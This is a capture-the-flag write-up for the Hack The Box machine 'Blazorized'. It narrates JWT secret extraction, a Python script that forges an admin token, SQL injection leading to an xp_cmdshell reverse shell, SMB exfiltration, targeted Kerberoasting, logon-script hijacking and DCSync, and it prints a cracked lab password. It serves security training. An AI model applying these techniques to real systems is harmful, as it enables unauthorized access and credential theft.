Blazorized
https://www.hackthebox.com/achievement/machine/107027/614

Enumeration
Enumerating with nmap's default timing resulted in long timeout errors:
To move forward, I started nmap with the -T4 option:
Port 80


There is a section called "Check for Updates" that looks interesting, because it interacts with some API as the administrator user:

There is also a "Markdown Playground":

The "Interesting Digital Gardens" and "Misc. Links" sections show an API interaction error:

Fuzzing virtual hosts with gobuster gives an interesting result:

admin.blazorized.htb requires credentials to log in:

When we click the Check for Updates button, the frontend queries the internal API for categories:

It's a Blazor WebAssembly app, so the client-side code ships to the browser: _framework/blazor.boot.json lists the application's metadata, including the DLLs it loads:

Judging by their names, these seem to be the most interesting ones:


In particular the last one:

If we copy the HTTP request for Blazorized.Helpers.dll and paste it into another tab, the browser downloads the DLL. We can then disassemble it with ildasm.exe on a Windows machine with Visual Studio installed:

This reveals hardcoded secrets in Blazorized.Helpers.dll:

The extracted values are these:
jwtSymmetricSecurityKey: (value not reproduced on this page)
(claim name not recovered): [email protected]
postsPermissionsClaimValue: Posts_Get_All
categoriesPermissionsClaimValue: Categories_Get_All
superAdminRoleClaimValue: Super_Admin
issuer: http://api.blazorized.htb
apiAudience: http://api.blazorized.htb
adminDashboardAudience: http://admin.blazorized.htb
Now, using these values, forge a JWT for the Super Admin on JWT Builder:
But we still need to know which signing algorithm the backend uses:

We can identify it by disassembling the JWT class and looking at the code where the valid algorithms are listed:

Finally, store the JWT in Local Storage as shown in the picture and refresh the page to reach the admin dashboard:
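As an added example (not from the original writeup), here is a stdlib-only Python script that forges the Super Admin token from the values extracted above and verifies it locally before it goes into Local Storage. The key and e-mail are placeholders to fill in from the extracted strings; the .NET claim-type URIs and the HS512 algorithm are assumptions that must be confirmed against the disassembled JWT class.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed values: issuer, audience and role are the strings pulled out of
# Blazorized.Helpers.dll; key and e-mail are placeholders (ASSUMPTION) to be
# replaced with the real extracted values.
JWT_KEY = "<jwtSymmetricSecurityKey from Blazorized.Helpers.dll>"
SUPER_ADMIN_EMAIL = "<super admin e-mail from Blazorized.Helpers.dll>"
ISSUER = "http://api.blazorized.htb"
ADMIN_AUDIENCE = "http://admin.blazorized.htb"
SUPER_ADMIN_ROLE = "Super_Admin"

# ASSUMPTION: these are the claim-type URIs ASP.NET Core uses for "email" and
# "role"; confirm them in the disassembled JWT class before use.
EMAIL_CLAIM = "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress"
ROLE_CLAIM = "http://schemas.microsoft.com/ws/2008/06/identity/claims/role"

# Only symmetric HMAC algorithms: the key we recovered is a shared secret.
HMAC_ALGS = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def super_admin_claims(now: int = None, lifetime: int = 3600) -> dict:
    """Claim set for the Super_Admin role, scoped to the admin dashboard audience."""
    now = int(time.time()) if now is None else now
    return {
        EMAIL_CLAIM: SUPER_ADMIN_EMAIL,
        ROLE_CLAIM: SUPER_ADMIN_ROLE,
        "iss": ISSUER,
        "aud": ADMIN_AUDIENCE,
        "nbf": now,
        "iat": now,
        "exp": now + lifetime,
    }


def forge_jwt(claims: dict, key: str, alg: str = "HS512") -> str:
    """Sign the claims with the symmetric key; alg must be one the backend accepts."""
    if alg not in HMAC_ALGS:
        raise ValueError(f"unsupported alg {alg}")
    header = {"alg": alg, "typ": "JWT"}
    signing_input = (
        b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url(json.dumps(claims, separators=(",", ":")).encode())
    )
    sig = hmac.new(key.encode(), signing_input.encode(), HMAC_ALGS[alg]).digest()
    return signing_input + "." + b64url(sig)


def verify_jwt(token: str, key: str) -> dict:
    """Local sanity check: recompute the HMAC, compare in constant time, return the claims."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    alg = header.get("alg")
    if alg not in HMAC_ALGS:  # refuse "none" or asymmetric algs outright
        raise ValueError(f"refusing alg {alg}")
    expected = hmac.new(key.encode(), f"{header_b64}.{payload_b64}".encode(), HMAC_ALGS[alg]).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("signature mismatch")
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    token = forge_jwt(super_admin_claims(), JWT_KEY)
    print(token)
    print(verify_jwt(token, JWT_KEY)[ROLE_CLAIM])
```

The printed token is what goes into Local Storage; if the backend rejects it, the first things to re-check are the algorithm and the audience, since a token minted for the API audience will not be accepted by the admin dashboard.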

On the home page of the admin control panel we find an interesting clue about how the application talks to its backend. From the earlier scan we know there is a Microsoft SQL Server 2022 listening:

Port 1433

This functionality probably builds the raw MSSQL query like this:
To inject SQL we close the string literal, terminate the statement, and append the statements that enable xp_cmdshell:
Then we run an encoded PowerShell command through xp_cmdshell to obtain a reverse shell:
We get a reverse shell as NU_1055 and can read the user flag 🎉

Download SharpHound onto the victim machine: we have a shell but no credentials, so we cannot run the AD collection remotely from Kali:
I used SharpHound v1.1.0 because of incompatibility errors when uploading the JSON into BloodHound: https://github.com/BloodHoundAD/BloodHound/issues/702

To get the ZIP onto the Kali machine we use SMB: from the reverse shell we copy it to a share served by impacket.
On the Kali machine, start an SMB server inside a directory, exposing it as a share called SHARE:

From Windows, create the username, password and credential variables, and define the source path of the file to exfiltrate:
Map the remote SMB share to a local drive:

Finally, copy the ZIP to the SMB share:


Now unzip and import the JSON files into BloodHound:


Mark NU_1055 as Owned and look for a privilege escalation path:

BloodHound shows that RSA_4810, a user we also saw earlier under C:\Users, can be made Kerberoastable:

Pathfinding from NU_1055 (start node) to RSA_4810 (end node) shows that NU_1055 has WriteSPN over RSA_4810:

To exploit this we perform a targeted Kerberoast (SPN-jacking): upload PowerView.ps1, write an SPN onto RSA_4810, then request a service ticket for that SPN so its hash can be cracked offline.
Set the SPN and request a service ticket:

We get the TGS hash; save it to a file and crack it with John the Ripper (this only pays off if the account's password is weak enough to crack):

Username: RSA_4810
Password: (Ni7856Do9854Ki05Ng0005 #)
Finally, log in as RSA_4810 with evil-winrm:
Privilege Escalation (SSA_6010)
Repeat the enumeration: run SharpHound again on the victim machine and exfiltrate the ZIP with the JSON files over the SMB server. BloodHound shows nothing new this time, so try PowerView instead:

PowerView shows that RSA_4810 can write the scriptPath (logon script) attribute of SSA_6010. So, as RSA_4810, we drop a reverse shell script into a directory we can write to and set it as the logon script for SSA_6010; it runs the next time that user logs on:

Set the ScriptPath for SSA_6010:

Get the reverse shell:

We already know from the BloodHound analysis that SSA_6010 has DCSync rights on the domain:

Privilege Escalation (Administrator)
Download Mimikatz onto the machine and grab the Administrator hash:

Run the DCSync attack with Mimikatz:

Log in with evil-winrm using the Administrator hash and the machine is pwned 🎉
